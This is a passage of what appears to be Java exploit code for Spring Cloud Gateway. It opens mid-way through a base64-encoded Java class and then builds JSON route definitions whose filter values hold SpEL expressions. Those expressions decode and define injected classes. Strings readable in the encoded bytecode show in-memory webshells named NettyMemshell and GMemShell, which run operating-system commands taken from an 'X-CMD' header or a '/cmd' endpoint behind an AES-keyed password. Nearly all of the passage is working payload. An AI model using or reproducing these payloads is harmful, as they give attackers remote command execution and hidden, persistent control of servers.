FuZy9DbGFzcwwAygDLBwDJDADMAM0BABBqYXZhL2xhbmcvT2JqZWN0DADOAM8HANAMANEA0gwA0wDUDADVANYMANcASAEADk5ldHR5V2ViU2VydmVyBwDIDADYANkMANoA2wcA3AwA0wDdDADeANYBAA9kb09uQ2hhbm5lbEluaXQBAA1OZXR0eU1lbXNoZWxsDADfAOABAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IHAOEMAGcA4gEAH3JlYWN0b3IubGVmdC5odHRwVHJhZmZpY0hhbmRsZXIBABBtZW1zaGVsbF9oYW5kbGVyBwDjDADkAOUBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFJlcXVlc3QMAOYA5wEABVgtQ01EBwDoDADYAOkMANMA6gEAEWphdmEvdXRpbC9TY2FubmVyBwDrDADsAO0MAO4A7wcA8AwA8QDyDABAAPMBAAJcQQwA9AD1DAD2AEgHAPcMAPgAeAwAdAB1DAD5AEEHAPoMAPsA/AEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcA/QwA/gD/BwEADAEBAQIHAQMMAQQBBQwAQAEGBwEHBwEIDAEJAQoBABl0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DADfAQsMAQwBDQcBDgwBDwEQBwERDAESARMBACVpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxEdXBsZXhIYW5kbGVyAQAncmVhY3Rvci9uZXR0eS9DaGFubmVsUGlwZWxpbmVDb25maWd1cmVyAQAQamF2YS9sYW5nL1N0cmluZwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkBAANnZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABhpby9uZXR0eS9jaGFubmVsL0NoYW5uZWwBACQoKUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZTsBACBpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZQEACWFkZEJlZm9yZQEAaShMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZztMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAB2hlYWRlcnMBACsoKUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEALmlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXMBAAJPSwEAD3ByaW50U3RhY2tUcmFjZQEAJmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0AQAPZmlyZUNoYW5uZWxSZWFkAQA8KExqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGWlvL25ldHR5L3V0aWwvQ2hhcnNldFV0aWwBAAVVVEZfOAEAGkxqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7AQAYaW8vbmV0dHkvYnVmZmVyL1VucG9vbGVkAQAMY29waWVkQnVmZmVyAQBNKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7KUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAHUoTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwVmVyc2lvbjtMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cztMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7KVYBACxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvRnVsbEh0dHBSZXNwb25zZQEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyTmFtZXMBAAxDT05URU5UX1RZUEUBABtMaW8vbmV0dHkvdXRpbC9Bc2NpaVN0cmluZzsBAFUoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9PYmplY3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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}\"}\n" +
664 | " }],\n" +
665 | " \"uri\": \"http://example.com\",\n" +
666 | " \"order\": 0\n" +
667 | "}";
668 |
669 | String json2="{\n" +
670 | "\"predicates\":[{\"name\": \"Path\",\n" +
671 | "\"args\":{\"_genkey_0\":\"/gmem/**\"}\n" +
672 | "}\n" +
673 | "],\n" +
674 | " \"id\": \"wolaile\",\n" +
675 | " \"filters\": [{\n" +
676 | " \"name\": \"AddResponseHeader\",\n" +
677 | " \"args\": {\n" +
678 | " \"name\": \"Result\",\n" +
679 | " \"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAXTGNvbS9leGFtcGxlL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQAMbGFtYmRhJGNtZCQwAQBHKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEAAmlkAQAEZGF0YQEAKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDsBAAZyZXN1bHQBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7BwC3AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOR01lbVNoZWxsLmphdmEMAGkAagEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABlAGYMARsBHAwAaABmDAEdAR4MAGcAkgwAZwBmDAEfASABAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MASEBIgwBIwEkAQAVY29tL2V4YW1wbGUvR01lbVNoZWxsAQAwb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmVyL1NlcnZlcldlYkV4Y2hhbmdlAQAQamF2YS9sYW5nL1N0cmluZwwBJQEoBwEpDAEqASsMASwBLQEAAm9rAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBLgBqAQAFZXJyb3IBABdqYXZhL25ldC9VUkxDbGFzc0xvYWRlcgEADGphdmEvbmV0L1VSTAcBLwwBMAExDAEyATMMAGkBNAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcBNQwBNgCZDAE3ATgBAANBRVMHARoMATkBOgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMATsBPAwAaQE9DAE+AT8MAUABQQEAA01ENQcBQgwBOQFDDAFEAUUMAUYBRwEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAFIATwMAGkBSQwBHQFKDAFLAR4BABBqYXZhLnV0aWwuQmFzZTY0DAFMAU0BAApnZXRFbmNvZGVyDAFOASIBAA5lbmNvZGVUb1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAU8BUAEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFRAVIBABBCb290c3RyYXBNZXRob2RzDwYBUxABVA8HAVUQAKkMAVYBVwcBWAwBWQFaAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwFbDAFcAV0MAGkBXgwBXwEeBwFgDAFhAVQMAJwAnQwAiQCKDABhAGIBAAdwYXlsb2FkBwFiDAFjAVQMAIEAggwBZAFlAQAKcGFyYW1ldGVycwEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtDAFmAWcMAWgBaQwBagE8DACVAJYMAWgBSgwBawFsAQARamF2YS91dGlsL0hhc2hNYXABABAzYzZlMGI4YTljMTUyMjRhAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhdGhzAQAHQnVpbGRlcgEADElubmVyQ2xhc3NlcwEAYChbTGphdmEvbGFuZy9TdHJpbmc7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyOwEASW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvJEJ1aWxkZXIBAAVidWlsZAEARSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAB2RvRmluYWwBAAYoW0IpW0IBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBADEoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3Q7AQAGbGVuZ3RoAQADKClJAQAGdXBkYXRlAQAHKFtCSUkpVgEABmRpZ2VzdAEABihJW0IpVgEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvVXBwZXJDYXNlAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0Rm9ybURhdGEBAB8oKUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87CgFtAW4BACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoAEgFvAQAFYXBwbHkBADYoTGNvbS9leGFtcGxlL0dNZW1TaGVsbDspTGphdmEvdXRpbC9mdW5jdGlvbi9GdW5jdGlvbjsBABtyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm8BAAdmbGF0TWFwAQA8KExqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAjb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXMBAAJPSwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czsBADooTGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzOylWAQAKZ2V0TWVzc2FnZQEAJm9yZy9zcHJpbmdmcmFtZXdvcmsvdXRpbC9NdWx0aVZhbHVlTWFwAQAIZ2V0Rmlyc3QBAA1qYXZhL3V0aWwvTWFwAQADZ2V0AQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9CeXRlQXJyYXkBAARqdXN0AQAxKExqYXZhL2xhbmcvT2JqZWN0OylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwcBcAwBcQF0DACoAKkBACJqYXZhL2xhbmcvaW52b2tlL0xhbWJkYU1ldGFmYWN0b3J5AQALbWV0YWZhY3RvcnkHAXYBAAZMb29rdXABAMwoTGphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcyRMb29rdXA7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlOylMamF2YS9sYW5nL2ludm9rZS9DYWxsU2l0ZTsHAXcBACVqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwAQAeamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzACEAEgANAAAABAAJAGEAYgABAGMAAAACAGQACQBlAGYAAAAJAGcAZgAAAAkAaABmAAAACgABAGkAagABAGsAAAAvAAEAAQAAAAUqtwABsQAAAAIAbAAAAAYAAQAAABMAbQAAAAwAAQAA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